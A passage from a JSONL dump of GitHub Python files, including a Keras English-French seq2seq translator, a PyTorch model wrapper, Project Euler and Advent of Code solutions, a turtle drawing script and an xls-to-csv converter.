Window(get_maya_window())\n\twindow.setObjectName(name)\n\twindow.setWindowTitle(title)\n\twindow.show()\n\treturn\n","repo_name":"lazerdaze/lancer","sub_path":"anim_mancer/tools/stopMotion/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":6859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"38529979347","text":"#Filename:\tnn.py\n#Author:\tWang Yongjie\n#Email:\t\tyongjie.wang@ntu.edu.sg\n#Date:\t\tSel 08 Des 2020 09:44:49 WIB\n\nimport torch\nimport os\nimport numpy as np\nfrom model.base_model import BaseModel\n\nclass NNModel(BaseModel):\n\n def __init__(self, model_path):\n\n super().__init__(model_path)\n self.load_model()\n # work in CPU mode\n self.model = self.model.cpu()\n self.model.eval()\n\n def load_model(self):\n if os.path.exists(self.model_path):\n self.model = torch.load(self.model_path)\n #self.model = torch.load(self.model_path, map_location = {\"cuda:0\":\"cuda:1\"}) \n\n def predict_ndarray(self, _input):\n \"\"\"\n _input: input numpy array\n predict: list of integer\n \"\"\"\n with torch.no_grad():\n input_tensor = torch.from_numpy(_input)\n pred = self.model(input_tensor).squeeze()\n out = torch.round(pred) \n return out.numpy().astype(np.int), pred.numpy()\n\n def predict_tensor(self, _input):\n \"\"\"\n _input: input tensor\n predict: list of tensor\n \"\"\"\n pred = self.model(_input).squeeze()\n out = torch.round(pred)\n return out, pred\n\n def gradient(self, _input):\n raise NotImplementedError\n\n","repo_name":"wangyongjie-ntu/SkylineCF","sub_path":"model/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"11847083867","text":"#61 Cyclical figurate numbers\n\nimport sys\n\n#Triangle 4 dig\nTrilist=[]\ntri=0\nfor a in range(45,141):\n\n tri=int((a**2+a)/2)\n Trilist=Trilist+[str(tri)]\n\n\n#Square\nSqulist=[]\nsqu=0\nfor b in range(32,100):\n\n squ=b**2\n Squlist=Squlist+[str(squ)]\n\n\n#Pent\nPentlist=[]\npent=0\n\nfor c in range(26,82):\n\n pent=int((c*(3*c-1))/2)\n Pentlist=Pentlist+[str(pent)]\n\n#Hex\nHlist=[]\nhexnum=0\n\nfor d in range(23,71):\n\n hexnum=d*(2*d-1)\n Hlist=Hlist+[str(hexnum)]\n\n#Hept\n\nHeplist=[]\nhep=0\n\nfor e in range(21,64):\n\n hep=int((e*(5*e-3))/2)\n Heplist=Heplist+[str(hep)]\n\n\n#Oct\n\nOctlist=[]\noctnum=0\n\nfor f in range(19,59):\n\n octnum=f*(3*f-2)\n Octlist=Octlist+[str(octnum)]\n\nfrom itertools import permutations\n\n\n\n\nposslist=list(permutations(['0','1','2','3','4','5'])) #Only 720 possible permuations and fairly short lists, so brute force is OK!\n\npermslist=[Trilist,Squlist,Pentlist,Hlist,Heplist,Octlist]\n\nfor a in posslist:\n\n for b in permslist[int(a[0])]:\n\n for c in permslist[int(a[1])]:\n\n if b[0:2]!=c[2:4]:\n\n continue\n\n else:\n\n for d in permslist[int(a[2])]:\n\n if c[0:2]!=d[2:4]:\n\n continue\n\n else:\n\n for e in permslist[int(a[3])]:\n\n if d[0:2]!=e[2:4]:\n\n continue\n\n else:\n\n for f in permslist[int(a[4])]:\n\n if e[0:2]!=f[2:4]:\n continue\n\n else:\n\n for g in permslist[int(a[5])]:\n\n if f[0:2]==g[2:4] and g[0:2]==b[2:4]:\n\n print(int(b)+int(c)+int(d)+int(e)+int(f)+int(g))\n sys.exit()\n\n \n\n\n\n","repo_name":"TimothyVirgil/project_euler","sub_path":"Old Solutions/61_Cyclical Figurate.py","file_name":"61_Cyclical Figurate.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"3052613133","text":"import keras\nimport numpy as np\nfrom tqdm import tqdm\nfrom nltk.tokenize import word_tokenize\n\nFRENCH_PATH = 'fra-eng/fra.txt'\nSUPPORTED_LANGUAGES = ['english', 'french']\n\nclass Language():\n \"\"\" Simple class to wrap information about a language \"\"\"\n\n def __init__(self, name, idxDict, vocabSize, maxSentLen, reverese=True):\n assert isinstance(name, str), 'name must have type str'\n assert isinstance(idxDict, dict), 'idxDict must have type dict'\n assert isinstance(vocabSize, int), 'vocbSize must have type int'\n assert isinstance(maxSentLen, int), 'maxSentLen must have type int'\n self.name = name\n self.idxDict = idxDict\n self.vocabSize = vocabSize\n self.maxSentLen = maxSentLen\n self.reverseIdx = None\n\n def __str__(self):\n return self.name\n\n def __repr__(self):\n return f'NAME={self.name}/VOCAB_SIZE={self.vocabSize}/MAX_LEN={self.maxSentLen}'\n\n def add_word(self, newWord):\n \"\"\" Add a new word to the vocabulary \"\"\"\n assert (newWord not in self.idxDict.keys()), f'{newWord} is already in the vocabulary'\n assert (self.vocabSize not in self.idxDict.values()), 'idx assignment error'\n self.idxDict.update({newWord : self.vocabSize})\n self.vocabSize += 1\n return True\n\n def remove_word(self, word):\n \"\"\" Remove a word from the dictionary \"\"\"\n assert (word in self.idxDict.keys()), f'{word} is not in the vocabulary'\n del self.idxDict[word]\n self.vocabSize -= 1\n return True\n\n def reverse_idx(self):\n \"\"\" Builds reverse idx mapping ids to words \"\"\"\n self.reverseIdx = {word : id for id, word in self.idxDict.items()}\n\n\ndef build_idx_dict(vocabSet):\n \"\"\" Builds dict mapping words from vocab iterable to unique id \"\"\"\n return {word : i for i, word in enumerate(vocabSet)}\n\n\ndef clean_text(text):\n \"\"\" Cleans and lower-cases text \"\"\"\n return text.strip().lower()\n\n\ndef split_and_clean_language_line(line, delimiter):\n # clean and lower line\n cleanLine = clean_text(line)\n # separate between original language and translation\n original, translation = cleanLine.split(delimiter)\n return original, translation\n\n\ndef pad_sentence_ends(sentence, startToken='START', endToken='END'):\n \"\"\" Pads raw text sentence with start and end tokens \"\"\"\n assert isinstance(sentence, str), 'sentence must have type str'\n return f'{startToken} {sentence} {endToken}'\n\n\ndef build_language_objects(filePath, featureLanguage, targetLanguage,\n delimiter='\\t', returnTrainData=True):\n \"\"\"\n Builds dicts mapping words to unique int id and finds max line length\n in each language for padding one-hot vecs\n Args:\n filePath Path to the file containing feature and\n translated text\n featureLanguage String of language for features\n targetLanguage String of language for targets\n delimiter (*optional) String of the delimiter separating\n features from targets defaults to tab\n returnTrainData Whether to return training data lists of\n token lists for each sentence in\n features and targets\n Returns:\n Language() object storing the attributes of each language\n \"\"\"\n # assertions\n assert (featureLanguage in SUPPORTED_LANGUAGES), f'{featureLanguage} is not supported'\n assert (targetLanguage in SUPPORTED_LANGUAGES), f'{targetLanguage} is not supported'\n assert isinstance(delimiter, str), 'delimiter must have type str'\n assert isinstance(returnTrainData, bool), 'returnTrainData must have type bool'\n # build set of all the words (and punctuation) in each language\n englishVocab, frenchVocab = set(), set()\n maxEnglish, maxFrench = 0, 0\n featureWords, targetWords = [], []\n with open(filePath, 'r') as translationFile:\n for i, line in enumerate(tqdm(translationFile)):\n # separate between english and french translation\n featureSent, targetSent = split_and_clean_language_line(line=line,\n delimiter=delimiter)\n # pad sentence beginnings and ends\n paddedFeatureSent = pad_sentence_ends(featureSent)\n paddedTargetSent = pad_sentence_ends(targetSent)\n # tokenize words in each language\n englishLineWords = word_tokenize(text=paddedFeatureSent,\n language=featureLanguage)\n frenchLineWords = word_tokenize(text=paddedTargetSent,\n language=targetLanguage)\n # update vocab sets\n for englishWord in englishLineWords:\n englishVocab.add(englishWord)\n for frenchWord in frenchLineWords:\n frenchVocab.add(frenchWord)\n # update max lengths\n maxEnglish = max(maxEnglish, len(englishLineWords))\n maxFrench = max(maxFrench, len(frenchLineWords))\n # update feature and target word lists\n featureWords.append(englishLineWords)\n targetWords.append(frenchLineWords)\n # build dict mapping each word to a unique int id\n englishIdxDict = build_idx_dict(englishVocab)\n frenchIdxDict = build_idx_dict(frenchVocab)\n # find vocab size of each language\n englishVocabSize = len(englishIdxDict)\n frenchVocabSize = len(frenchIdxDict)\n # convert language information into Language() objects\n englishObj = Language(name='english', idxDict=englishIdxDict,\n vocabSize=englishVocabSize, maxSentLen=maxEnglish)\n frenchObj = Language(name='french', idxDict=frenchIdxDict,\n vocabSize=frenchVocabSize, maxSentLen=maxFrench)\n # build reverse idx for language objects\n englishObj.reverse_idx()\n frenchObj.reverse_idx()\n # return either language objs or language objs and train data\n if not returnTrainData:\n return englishObj, frenchObj\n else:\n return englishObj, frenchObj, featureWords, targetWords\n\n\ndef encode_sentence(sentence, languageObj):\n \"\"\"\n Encodes single sentence in languageObj language. Not used during training\n preprocessing for efficiency but used during prediction.\n Args:\n sentence: Raw text of sentence\n languageObj: Language() object of sentence language\n Returns:\n Matrix of shape (maxSentLen, vocabSize) comprising one-hot encodings\n of sentence.\n \"\"\"\n # assertions\n assert isinstance(sentence, str), 'sentence must have type str'\n assert isinstance(languageObj, Language), 'languageObj must have type Language()'\n assert (languageObj.name in SUPPORTED_LANGUAGES), f'{languageObj.name} is not supported'\n # clean and tokenize the sentence\n cleanSentence = clean_text(sentence)\n sentenceTokens = word_tokenize(cleanSentence, language=languageObj.name)\n # initialize matrix\n matrixShape = (languageObj.maxSentLen, languageObj.vocabSize)\n sentenceMatrix = np.zeros(shape=matrixShape)\n for wordNum, word in enumerate(sentenceTokens):\n wordId = languageObj.idxDict[word]\n sentenceMatrix[wordNum, wordId]\n return sentenceMatrix\n\n\ndef one_hot_encode_training_data(featureWords, targetWords, featureLanguageObj,\n targetLanguageObj, sampleNum=None):\n \"\"\"\n Encodes matrix of raw unpadded feature and target words\n Args:\n featureWords: List of token lists for each original sentence\n targetWords: List of token lists for each target sentence\n featureLanguageObj: Language() object of feature language\n targetLanguageObj: Language() object of target language\n sampleNum (*optional): Maximum number of samples to encode;\n defaults to None: all will be encoded\n Returns:\n encoderFeatures: Numpy matrix of one-hot encoded words for each\n sentence padded to maxSentLen. Used to train\n encoder LSTM cell and hidden states. Shape\n is (sampleNum, featureSentLen,\n featureVocabSize)\n decoderFeatures: Numpy matrix of one-hot encoded words for each\n sentence padded to maxSentLen. Used as\n input to decoder LSTM for teacher forcing\n training speed improvement. Shape is\n (sampleNum, targetSentLen, targetVocabSize)\n\n decoderTargets: Numpy matrix of one-hot encoded words advanced\n by one time step with respect to\n decoderFeatures. Used as final prediction\n target for decoder LSTM (and model).\n \"\"\"\n # assertions and formatting\n if not sampleNum:\n sampleNum = (len(featureWords) + 1)\n assert isinstance(sampleNum, int), 'sampleNum mut have type int'\n assert isinstance(featureLanguageObj, Language), 'featureLanguageObj must have type Language()'\n assert isinstance(targetLanguageObj, Language), 'targetLanguageObj must have type Language()'\n # cache length of each sentence matrix in feature and target space\n featureSentLen = featureLanguageObj.maxSentLen\n targetSentLen = targetLanguageObj.maxSentLen\n # cache length of one-hot vector in feature and target space\n featureVocabSize = featureLanguageObj.vocabSize\n targetVocabSize = targetLanguageObj.vocabSize\n # tuple of shapes for encoder inputs and decoder inputs and targets\n encoderInputShape = (sampleNum, featureSentLen, featureVocabSize)\n decoderInputShape = (sampleNum, targetSentLen, targetVocabSize)\n # initialize empty 3D arrays for training data\n encoderFeatures = np.zeros(shape=encoderInputShape, dtype='int32')\n decoderFeatures = np.zeros(shape=decoderInputShape, dtype='int32')\n decoderTargets = np.zeros(shape=decoderInputShape, dtype='int32')\n # cache idx dict for each language\n featureIdxDict = featureLanguageObj.idxDict\n targetIdxDict = targetLanguageObj.idxDict\n # iterate over features and targets, building encoded arrays\n for sentNum, (featureSent, targetSent) in tqdm(enumerate(zip(featureWords,\n targetWords))):\n if sentNum >= sampleNum:\n break\n # iterate over current feature sentence building 2D matrix of one-hot\n # encoded vectors of each word\n for wordNum, word in enumerate(featureSent):\n wordId = featureIdxDict[word]\n encoderFeatures[sentNum, wordNum, wordId] = 1\n # iterate over target sentence building one-hot matrix for decoder\n # inputs for teacher forcing and targets for decoder output advanced\n # one time step into the future\n for wordNum, word in enumerate(targetSent):\n wordId = targetIdxDict[word]\n decoderFeatures[sentNum, wordNum, wordId] = 1\n # decoder target will be the same word but one time-step ahead\n if wordNum > 0:\n decoderTargets[sentNum, (wordNum - 1), wordId] = 1\n return encoderFeatures, decoderFeatures, decoderTargets\n\n\ndef id_encode_training_data(featureWords, targetWords, featureLanguageObj,\n targetLanguageObj, sampleNum=None):\n \"\"\"\n Encodes feature and target words as dense, padded matrix of word ids\n Args:\n featureWords: List of token lists for each original sentence\n targetWords: List of token lists for each target sentence\n featureLanguageObj: Language() object of feature language\n targetLanguageObj: Language() object of target language\n sampleNum (*optional): Maximum number of samples to encode;\n defaults to None: all will be encoded\n Returns:\n encoderFeatures: Numpy matrix of word ids for each word in\n sentence, padded up to maxSentLen. Used\n to train encoder LSTM cell and hidden\n states with previous Embedding layer.\n Shape is (sampleNum, featureSentLen).\n decoderFeatures: Numpy matrix of word ids for each word in\n sentence, padded up to maxSentLen. Used as\n input to decoder LSTM for teacher forcing\n training speed improvement. Shape is\n (sampleNum, targetSentLen).\n decoderTargets: Numpy matrix of one-hot encodings for each word\n in sentence, padded up to maxSentLen.\n Used as final prediction target for decoder\n LSTM (and model). Shape is (sampleNum,\n targetSentLen, vocabSize). It is important\n to note that decoderTargets are sparse and\n high order compared to encoderFeatures\n and decoderFeatures, as dense, softmax\n classification must be done on comprehenive\n vectors rather than low-dimensional\n encodings.\n \"\"\"\n # assertions and formatting\n if not sampleNum:\n sampleNum = (len(featureWords) + 1)\n assert isinstance(sampleNum, int), 'sampleNum mut have type int'\n assert isinstance(featureLanguageObj, Language), 'featureLanguageObj must have type Language()'\n assert isinstance(targetLanguageObj, Language), 'targetLanguageObj must have type Language()'\n # pull out length of each sentence matrix in feature and target space\n featureSentLen = featureLanguageObj.maxSentLen\n targetSentLen = targetLanguageObj.maxSentLen\n # cache idx dict for each language\n featureIdx = featureLanguageObj.idxDict\n targetIdx = targetLanguageObj.idxDict\n # pull out target vocab size\n targetVocabSize = targetLanguageObj.vocabSize\n # tuple of shapes for encoder inputs and decoder inputs and targets\n encoderInputShape = (sampleNum, featureSentLen)\n decoderInputShape = (sampleNum, targetSentLen)\n decoderTargetShape = (sampleNum, targetSentLen, targetVocabSize)\n # initialize empty arrays for training data: features 2D, targets 3D\n encoderFeatures = np.zeros(shape=encoderInputShape, dtype='int32')\n decoderFeatures = np.zeros(shape=decoderInputShape, dtype='int32')\n decoderTargets = np.zeros(shape=decoderTargetShape, dtype='int32')\n # iterate over features and targets, building dense matrix with padding\n for sentNum, (featureSent, targetSent) in tqdm(enumerate(zip(featureWords,\n targetWords))):\n for wordNum, word in enumerate(featureSent):\n wordId = featureIdx[word]\n encoderFeatures[sentNum, wordNum] = wordId\n for wordNum, word in enumerate(targetSent):\n wordId = targetIdx[word]\n decoderFeatures[sentNum, wordNum] = wordId\n # decoder target is one time-step advanced and one-hot encoded\n if wordNum > 0:\n decoderTargets[sentNum, (wordNum - 1), wordId] = 1\n return encoderFeatures, decoderFeatures, decoderTargets\n\n\n# def bert_encode_training_data(featureWords, targetWords, featureLanguageObj,\n# targetLanguageObj, sampleNum=None):\n# \"\"\"\n# Encodes feature and target words as contextual BERT-embeddings in feature\n# language for decoding and simpler model architecture.\n# Args:\n# featureWords: List of token lists for each original sentence\n# targetWords: List of token lists for each target sentence\n# featureLanguageObj: Language() object of feature language\n# targetLanguageObj: Language() object of target language\n# sampleNum (*optional): Maximum number of samples to encode;\n# defaults to None: all will be encoded\n# Returns:\n# encoder\n# \"\"\"\n# # assertions and formatting\n# if not sampleNum:\n# sampleNum = (len(featureWords) + 1)\n# assert isinstance(sampleNum, int), 'sampleNum mut have type int'\n# assert isinstance(featureLanguageObj, Language), 'featureLanguageObj must have type Language()'\n# assert isinstance(targetLanguageObj, Language), 'targetLanguageObj must have type Language()'\n# assert (featureLanguageObj.name == 'english'), f'{featureLanguageObj.name} is not supported by current BERT model'\n #\n\n\ndef build_one_hot_encoder_decoder(featureLanguageObj, targetLanguageObj,\n latentDims=300):\n \"\"\"\n Builds encoder/decoder LSTM model for training on one-hot word vectors with\n final dense layer softmax predictions of next word. Uses LSTM encoder to\n generate cell and hidden state vector to initialize decoder LSTM. Uses\n teacher forcing to avoid model instability and slow decoder training.\n Training on one-hot vectors across vocabSize takes a lot of compute and\n is not recommended for word level models.\n Args:\n featureLanguageObj: Language() obj for feature data\n targetLanguageObj: Language() obj for target data\n latentDims: Number of latent dimensions for encoder\n LSTM (aka. length of hidden and\n cell vector) and initial state of\n decoder LSTM.\n Returns:\n Uncompiled model of encoder/decoder LSTM.\n \"\"\"\n # cache language info from Language() objects\n featureVocabSize = featureLanguageObj.vocabSize\n targetVocabSize = targetLanguageObj.vocabSize\n ## encoder architecture ##\n # encoder takes one-hot vector of current token\n encoder_in = keras.layers.Input(shape=(featureVocabSize,), name='encoder_in')\n # LSTM builds cell vector of size latentDims from inputs\n encoder_lstm = keras.layers.LSTM(units=latentDims, return_state=True,\n name='encoder_lstm')\n encoder_outputs, hidden_state, cell_state = encoder_lstm(encoder_in)\n # pull just the hidden and cell state from the lstm\n encoder_states = [hidden_state, cell_state]\n ## decoder architecture ##\n # decoder takes one-hot vector of correct token (teach forcing)\n decoder_in = keras.layers.Input(shape=(None, targetVocabSize),\n name='decoder_in')\n # LSTM builds cell vector of size latentDims from inputs and encoder states\n decoder_lstm = keras.layers.LSTM(units=latentDims, return_sequences=True,\n return_state=True, name='decoder_lstm')\n decoder_outputs, _, _ = decoder_lstm(decoder_in,\n initial_state=encoder_states)\n # dense layer uses softmax activation for token prediction\n decoder_dense = keras.layers.Dense(units=targetVocabSize,\n activation='softmax',\n name='decoder_dense')\n decoder_outputs = decoder_dense(decoder_outputs)\n # model takes encoder and decoder inputs and predicts on decoder outputs\n model = keras.models.Model([encoder_in, decoder_in], decoder_outputs)\n return model\n\n\ndef build_embedding_encoder_decoder(featureLanguageObj, targetLanguageObj,\n latentDims=300):\n \"\"\"\n Builds encoder/decoder LSTM model for training on scalar word id with\n final dense layer softmax predictions of next word across vocabSize vector.\n Uses LSTM encoder on embeddings to generate cell and hidden state vector to\n initialize decoder LSTM. Uses teacher forcing to avoid model instability\n and slow decoder training. Embedding word ids is faster than one-hot\n for word-level models.\n Args:\n featureLanguageObj: Language() obj for feature data\n targetLanguageObj: Language() obj for target data\n latentDims: Number of latent dimensions for encoder\n LSTM (aka. length of hidden and\n cell vector) and initial state of\n decoder LSTM.\n Returns:\n Uncompiled model of encoder/decoder LSTM with embedding layer.\n \"\"\"\n # cache language info from Language() objects\n featureVocabSize = featureLanguageObj.vocabSize\n targetVocabSize = targetLanguageObj.vocabSize\n ## encoder architecture ##\n # encoder takes scalar id of token\n encoder_in = keras.layers.Input(shape=(None,), name='encoder_in')\n # embedding layer builds dense vectors of latentDims from input ids\n encoder_embeddings = keras.layers.Embedding(input_dim=featureVocabSize,\n output_dim=latentDims)(encoder_in)\n encoder_lstm = keras.layers.LSTM(units=latentDims, return_state=True,\n name='encoder_lstm')\n encoder_outputs, hidden_state, cell_state = encoder_lstm(encoder_embeddings)\n # pull just the hidden and cell state from the lstm\n encoder_states = [hidden_state, cell_state]\n ## decoder architecture ##\n # decoder takes scalar id of correct token (teach forcing)\n decoder_in = keras.layers.Input(shape=(None,), name='decoder_in')\n # embedding layer builds dense vectors of latentDims in target language\n decoder_embedding = keras.layers.Embedding(input_dim=targetVocabSize,\n output_dim=latentDims)(decoder_in)\n decoder_lstm = keras.layers.LSTM(units=latentDims, return_sequences=True,\n name='decoder_lstm')\n decoder_outputs = decoder_lstm(decoder_embedding, initial_state=encoder_states)\n # dense layer uses softmax for token prediction across one-hot vectors\n decoder_dense = keras.layers.Dense(units=targetVocabSize,\n activation='softmax')\n decoder_outputs = decoder_dense(decoder_outputs)\n # build and return model\n model = keras.models.Model([encoder_in, decoder_in], decoder_outputs)\n return model\n\n\ndef compile_and_train_model(encoderFeatures, decoderFeatures, decoderTargets,\n model, epochs=10, validation_split=0.1,\n outPath=None):\n \"\"\"\n Compiles and trains encoder/decoder model according to hyperparameters and\n saves to outPath of given.\n Args:\n encoderFeatures: Matrix of features for encoder training\n decoderFeatures: Matrix of features for decoder teaching\n deocderTargets: Matrix of targets for decoder training\n model: Uncompiled encoder/decoder model\n epochs: Number of epochs for which to train\n validation_split: Train/test split for model validation\n outPath: Path to which to save the model\n \"\"\"\n # compile the model\n model.compile(optimizer='rmsprop',\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n # train the model on input data\n model.fit([encoderFeatures, decoderFeatures], decoderTargets,\n epochs=epochs, validation_split=validation_split)\n if outPath:\n model.save(outPath)\n return model\n\n\n# gather the data from file\n(englishObj,\n frenchObj,\n featureWords,\n targetWords\n) = build_language_objects(filePath=FRENCH_PATH, featureLanguage='english',\n targetLanguage='french', returnTrainData=True)\n# encode the data\n(encoderFeatures,\n decoderFeatures,\n decoderTargets\n) = id_encode_training_data(featureWords=featureWords, targetWords=targetWords,\n featureLanguageObj=englishObj,\n targetLanguageObj=frenchObj)\n\n# build encoder/decoder model\nmodel = build_embedding_encoder_decoder(featureLanguageObj=englishObj,\n targetLanguageObj=frenchObj)\nprint(model.summary())\n# train model\ntrainedModel = compile_and_train_model(encoderFeatures,\n decoderFeatures,\n decoderTargets,\n model,\n epochs=100,\n outPath='encoderDecoderModel.sav')\n\n\n# import keras\n#\n# trainedModel = keras.models.load_model('encoderDecoderModel.sav')\n# print(trainedModel.summary())\n#\n# ## Sampling ##\n# encoder_model = keras.models.Model(encoder_in, encoder_states)\n#\n# decoder_state_input_h = keras.layers.Input(shape=(latentDims,))\n# decoder_state_input_c = keras.layers.Input(shape=(latentDims,))\n# decoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]\n# decoder_outputs, state_h, state_c = decoder_lstm(decoder_in, initial_state=decoder_states_inputs)\n# decoder_states = [state_h, state_c]\n# decoder_outputs = decoder_dense(decoder_outputs)\n# decoder_model = keras.models.Model(\n# [decoder_in] + decoder_states_inputs,\n# [decoder_outputs] + decoder_states)\n#\n#\n# def decode_sequence(input_seq):\n# # Encode the input as state vectors.\n# states_value = encoder_model.predict(np.expand_dims(input_seq, axis=0))[0]\n#\n# # Generate empty target sequence of length 1.\n# target_seq = np.zeros((1, 1, frenchObj.vocabSize))\n# # Populate the first character of target sequence with the start character.\n# target_seq[0, 0, frenchObj.idxDict['START']] = 1.\n#\n# # Sampling loop for a batch of sequences\n# # (to simplify, here we assume a batch of size 1).\n# stop_condition = False\n# decoded_sentence = ''\n# while not stop_condition:\n# output_tokens, h, c = decoder_model.predict(\n# target_seq + states_value)\n#\n# # Sample a token\n# sampled_token_index = np.argmax(output_tokens[0, -1, :])\n# sampled_char = frenchObj.reverseIdx[sampled_token_index]\n# decoded_sentence += sampled_char\n#\n# # Exit condition: either hit max length\n# # or find stop character.\n# if (sampled_char == 'END' or\n# len(decoded_sentence) > frenchObj.maxSentLen):\n# stop_condition = True\n#\n# # Update the target sequence (of length 1).\n# target_seq = np.zeros((1, 1, frenchObj.vocabSize))\n# target_seq[0, 0, sampled_token_index] = 1.\n#\n# # Update states\n# states_value = [h, c]\n#\n# return decoded_sentence\n#\n#\n# while True:\n# text = input('Text: ')\n# input_seq = encode_sentence(text, englishObj)\n# decoded_sentence = decode_sequence(input_seq)\n# print('Decoded sentence:', decoded_sentence)\n","repo_name":"landjbs/Translation","sub_path":"translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":27520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"11963660548","text":"import turtle\n\ncanvas = turtle.Screen()\npen = turtle.Turtle()\n\n# basic commands\ndef polygon(side, size):\n for _ in range(side):\n pen.forward(size)\n pen.left(float(360/side))\n\npen.color('red')\n\npen.begin_fill()\npolygon(7, 100)\n\npen.end_fill()\n\nturtle.done()\n\n\n","repo_name":"ava6969/CS101","sub_path":"AndrewLesson5.py","file_name":"AndrewLesson5.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"43495030771","text":"\nfrom typing import List, Set\nfrom utils import AdventSession, extract_year_day_from_path\n\nsession = AdventSession(**extract_year_day_from_path(__file__))\n\nclass Chip(int):\n pass\n\nclass Output:\n all_outputs = dict()\n def __init__(self, n: int) -> None:\n self.n = n\n self.__class__.all_outputs[n] = self\n \n def add_chip(self, chip: Chip):\n self.chip = chip\n \n def __repr__(self) -> str:\n return f'Output {self.n} has chip {self.chip}'\n\nclass Bot:\n all_bots = dict()\n def __init__(self, n) -> None:\n self.n = n\n self.chips = []\n \n self.__class__.all_bots[n] = self\n self.logic = {\n 'low': None,\n 'high': None,\n }\n \n def __repr__(self) -> str:\n return f'Bot {self.n} has {self.chips}'\n def add_chip(self, chip: Chip):\n self.chips.append(chip)\n if len(self.chips) == 2:\n low, high = sorted(self.chips)\n \n\n if self.logic['low']:\n result = self.logic['low'].add_chip(low)\n if result:\n return result\n self.chips.remove(low)\n if self.logic['high']:\n result = self.logic['high'].add_chip(high)\n if result:\n return result\n self.chips.remove(high)\n \n if low == Chip(17) and high == Chip(61):\n return self\n def __hash__(self) -> int:\n return hash(self.n)\n \n @classmethod\n def add_bot_if_not_exist(cls, bot_n: int):\n if bot_n in cls.all_bots:\n return cls.all_bots[bot_n]\n bot = Bot(bot_n)\n cls.all_bots[bot_n] = bot\n return bot\n \n \ndef parse_bot_logic(rule: str):\n bot_, bot_n, give, low, to, bot_output, low_b, *_, bot_output2, high_b = rule.split()\n bot = Bot.add_bot_if_not_exist(int(bot_n))\n \n if bot_output == 'bot':\n low_bot = Bot.add_bot_if_not_exist(int(low_b))\n bot.logic['low'] = low_bot\n elif bot_output == 'output':\n bot.logic['low'] = Output(int(low_b))\n else:\n raise Exception(f'wrong bot output string {bot_output}')\n \n if bot_output2 == 'bot':\n high_bot = Bot.add_bot_if_not_exist(int(high_b))\n bot.logic['high'] = high_bot\n elif bot_output2 == 'output':\n bot.logic['high'] = Output(int(high_b))\n else:\n raise Exception(f'wrong bot2 output string {bot_output2}')\n \n \n \ndef parse_bot_chip_value(rule: str):\n value, chip_v, goes, to, bot_, bot_n = rule.split()\n bot = Bot.add_bot_if_not_exist(int(bot_n))\n return bot.add_chip(Chip(chip_v))\n\n\n@session.submit_result(level=1, tests=[({'inp': {\n 'value 75 goes to bot 2',\n 'bot 2 gives low to bot 1 and high to bot 0',\n 'value 17 goes to bot 1',\n 'bot 1 gives low to output 1 and high to bot 0',\n 'bot 0 gives low to output 2 and high to output 0',\n 'value 61 goes to bot 2',\n}}, 1)])\ndef solve_part1(inp: Set[str]):\n bot_logics = {logic for logic in inp if logic.startswith('bot')}\n [parse_bot_logic(logic) for logic in bot_logics]\n \n bot_values = inp-bot_logics\n for bot_value in bot_values:\n answer_bot = parse_bot_chip_value(bot_value)\n if answer_bot is not None:\n return answer_bot.n\n\n \n@session.submit_result(level=2, tests=[({'inp': {\n 'value 5 goes to bot 2',\n 'bot 2 gives low to bot 1 and high to bot 0',\n 'value 3 goes to bot 1',\n 'bot 1 gives low to output 1 and high to bot 0',\n 'bot 0 gives low to output 2 and high to output 0',\n 'value 2 goes to bot 2',\n}}, 30)])\ndef solve_part2(inp: Set[str]):\n bot_logics = {logic for logic in inp if logic.startswith('bot')}\n [parse_bot_logic(logic) for logic in bot_logics]\n [parse_bot_chip_value(value) for value in inp - bot_logics]\n return Output.all_outputs[0].chip * Output.all_outputs[1].chip * Output.all_outputs[2].chip\n\n\nif __name__ == '__main__':\n inp = {i for i in session.read_input().split('\\n') if i}\n \n solve_part1(inp)\n \n solve_part2(inp)\n","repo_name":"light-le/AdventOfCode","sub_path":"2016/day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":4093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"20461625946","text":"#!/usr/bin/env python\n\nimport csv\nimport re\nimport sys\nimport pandas as pd\n\nif sys.version[0] == '2':\n\treload(sys)\n\tsys.setdefaultencoding(\"utf-8\")\n\nif (len(sys.argv) < 2):\n\tprint('''Invalid file path!\n\t\tUsage: xls2csv /path/to/xls_file # for command line output\n\t\tUsage: xls2csv /path/to/xls_file /path/to/csv_file # for writing in a csv file\n\t''')\n\tsys.exit(1)\n\nargv_len = len(sys.argv)\nworkbook = pd.read_excel(sys.argv[1], header=None, engine='xlrd') # only for xls\n\nif (argv_len > 2): # if output file is provided\n csv_file = open(sys.argv[2], 'w')\n writer = csv.writer(csv_file)\n\nfor row in workbook.values:\n\tif (argv_len > 2): # if output file is provided\n\t\twriter.writerow(row)\n\telse:\n\t\trow2str = ','.join(str(s) for s in row)\n\t\trow2str = re.sub(r\"00\\:00\\:00|\\s\", '', row2str)\n\t\trow2str = row2str.rstrip('.')\n\t\tprint(row2str)\n\nsys.exit(0)\n","repo_name":"Sosomqk/xlstocsv","sub_path":"xlstocsv.py","file_name":"xlstocsv.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"74901946375","text":"# -*- coding: utf8 -*-\nimport unittest\nfrom .weakreflist import WeakList\nimport sys\nis_pypy = \"__pypy__\" in sys.builtin_module_names\n\n\nclass DocExampleTest(unittest.TestCase):\n if not is_pypy:\n def test_example1(self):\n class A(object):\n \"\"\"weakrefs don't function directly on object()\"\"\"\n\n objectA = A()\n my_list = WeakList([objectA])\n assert len(my_list) == 1\n del objectA\n assert len(my_list) == 0 # objectA removed from list\n else:\n def test_example2(self):\n import gc\n\n class A(object):\n \"\"\"weakrefs don't function directly on 